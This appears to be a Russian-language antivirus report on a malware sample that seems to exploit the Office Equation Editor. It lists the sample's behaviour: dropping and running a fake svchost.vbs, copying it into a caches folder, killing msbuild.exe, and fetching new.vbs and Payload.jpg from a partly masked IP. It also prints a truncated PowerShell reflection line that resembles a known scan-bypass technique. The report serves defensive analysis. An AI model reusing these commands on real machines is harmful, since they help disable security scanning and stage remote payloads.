Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "C:\Users\Public\svchost.vbs"
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValu...
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\svchost.vbs
- %LOCALAPPDATA%\microsoft\windows\caches\svchost.vbs
Сетевая активность
Подключается к
- '18.##9.128.212':80
TCP
Запросы HTTP GET
- http://18.##9.128.212/n/new.vbs
- http://18.##9.128.212/p/Payload.jpg
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c cOpY "C:\Users\Public\svchost.vbs" "%LOCALAPPDATA%\Microsoft\Windows\Caches" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValu...' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c cOpY "C:\Users\Public\svchost.vbs" "%LOCALAPPDATA%\Microsoft\Windows\Caches" /Y
